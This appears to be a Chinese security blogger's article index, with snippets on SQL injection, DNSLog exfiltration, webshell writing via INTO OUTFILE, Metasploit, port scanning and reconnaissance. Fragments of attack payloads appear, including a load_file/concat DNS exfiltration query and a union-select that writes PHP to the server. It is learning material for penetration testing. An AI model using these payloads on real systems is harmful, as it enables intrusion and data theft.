
渗透测试
反余弦函数
这个作者很懒,什么都没留下…
展开
-
记一次xss和任意密码修改漏洞
xss和任意密码修改漏洞原创 2022-01-30 13:56:29 · 2652 阅读 · 0 评论 -
DNSLog注入
DNSLog注入原理以及错误原因链接地址https://www.freebuf.com/articles/web/259023.html错误原因1. 路径错误2. 不是root用户、secure_file_priv的限制3. url地址不正确,dnslog平台解析的是url地址,所以连接的地址只能包含数字字母下划线这3类sqlselect * from table_name where id=1 union select 1,load_file(concat('\\\\',(select原创 2022-01-29 12:22:32 · 594 阅读 · 0 评论 -
文件上传绕过知识点PHP
记一次看过文件上传绕过方式链接地址https://xz.aliyun.com/t/10459原创 2022-01-27 15:43:20 · 3026 阅读 · 0 评论 -
SQL注入之MySQL注入姿势及绕过
SQL注入之MySQL注入姿势及绕过参考链接:https://xz.aliyun.com/t/10594感受1. 写的详细,并且绕过姿势也很多,大佬级人物2. 在网上发现类似的文章,感觉这就是为啥知识需要付费的原因。3. 学到的东西很多...原创 2022-01-23 15:20:33 · 3064 阅读 · 0 评论 -
SQL注入写shell权限
SQL注入写shell权限需要的条件1. root权限2. 知道网站的物理绝对路径3. load_file() 开启 即 secure_file_priv 无限制 可以通过select @@secure_file_priv;查询(1):如果为NULL,则不能写入(2):如果为空,可以在任意文件位置下写入(3):如果为一个路径,可以在该文件路径写入4. 有写入权限联合写入?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into原创 2022-01-21 19:06:33 · 3698 阅读 · 0 评论 -
MSF基础
MSF基础知识Metasploit框架是一个开源工具,目的是方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。需要在命令行输入msconsole知识点:更新命令:1. apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新。2. apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。3. apt-get dist-upgrade:升级整原创 2021-10-19 13:16:27 · 524 阅读 · 0 评论 -
渗透测试之信息收集
信息收集应该做的那些事在信息收集中,最主要的就是收集服务器的配置信息和网站的敏感信息,其中包括子域名信息、目标网站系统、CMS指纹、目标网站的真实IP、开放的端口等。收集域名信息Whois查询在为whois查询中,得到注册人的姓名和邮箱信息通常对测试个人站点非常有用,因为我们可以通过搜索引擎和社交网络挖掘出域名所有人的很多信息。在线whois查询常用的网站有爱站工具网站https://whois.aizhan.com站长之家http://whois.chinaz.com和VirusTotalht原创 2021-10-14 20:36:23 · 1334 阅读 · 0 评论 -
内网穿透之运行木马程序
步骤:1.自己必须要能运行CS,并且在内网自己可以实现运行木马2.两个内网之间:简单步骤:公网图片本机图片:CS图片:木马在win7图片:这只是简单的步骤,如果实现不懂,可以在下方评论,我可以给你解答。...原创 2021-10-04 16:26:01 · 709 阅读 · 0 评论 -
渗透之端口扫描
端口扫描scapy UDP scan端口关闭:ICMP port-unreachable端口开放:没有回包了解每一种基于UDP的应用层包结构很有帮助的与三层相同的技术误判scapysr1(IP(dst=“192.168.0.68”)/UDP(dport=53),timeout=1,verbose=1TCP端口扫描基于连接的协议三次握手隐蔽扫描僵尸扫描全连接扫描所有的TCP扫描方式都是基于三次握手的变化来判断目标端口状态隐蔽端口扫描隐蔽扫描—syn不原创 2021-08-18 11:05:22 · 264 阅读 · 0 评论 -
主动信息收集
主动信息收集主动信息收集介绍:直接与目标系统交互通信无法避免留下访问的痕迹使用受控的第三方电脑进行探测:使用代理或已经被控制的主机做好封杀的准本使用噪声迷惑目标,淹没真实的探测流量扫描发送不同的探测,根据返回结果判断目标状态发现识别活着的主机潜在的被攻击目标输出一个ip地址列表2、3、4层发现发现之二层发现arping:arping 192.168.0.53 -c 1(发送一次arp包)arping 192.168.0.1 -d(可以过滤调重原创 2021-08-18 09:45:41 · 138 阅读 · 0 评论 -
被动信息收集之各软件应用
被动信息收集SHODAN搜索软件可以搜索联网设备Banner:http、ftp、ssh、telnet网页地址:https://www.shodan.io/常见的过滤规则:net (192.168.1.20) 例子:net:192.168.1.20city(城市过滤) 例子:city:beijingcountry(国家过滤) 例子:country:(CN、US)port(端口过滤) 例子:port:(80、21、22、23)os(操作系统过滤) 例子:os:linux原创 2021-08-16 13:05:11 · 319 阅读 · 0 评论 -
安全渗透之DNS信息收集
DNS信息收集nslookup信息收集:nslookup www.sina.com(解析www.sina.com对应的ip信息)server(指定域名服务器)比如:server 8.8.8.8type=a、mx、ns、any,搜集域名下对应的类型,也可以q=a等a表示主机记录mx表示邮件记录ns表示dns记录any表示查询所有的记录nslookup -type=ns sina.com 123.125.29.99(指定域名服务器解析)DIG信息收集:dig @8.8.8.8 www原创 2021-08-10 23:01:25 · 639 阅读 · 0 评论 -
SQLI注入之Union注入
简单的Union注入1.MySql注入常用函数:函数名称函数功能system_user()系统用户名user()用户名current_user()当前用户名session_user()连接数据库的用户名database()当前数据库名version()数据库版本@@datadir数据库路径@@basedir数据库安装路径@@version_compile_os操作系统版本count()返回执行结果数量co原创 2021-06-20 22:36:28 · 199 阅读 · 0 评论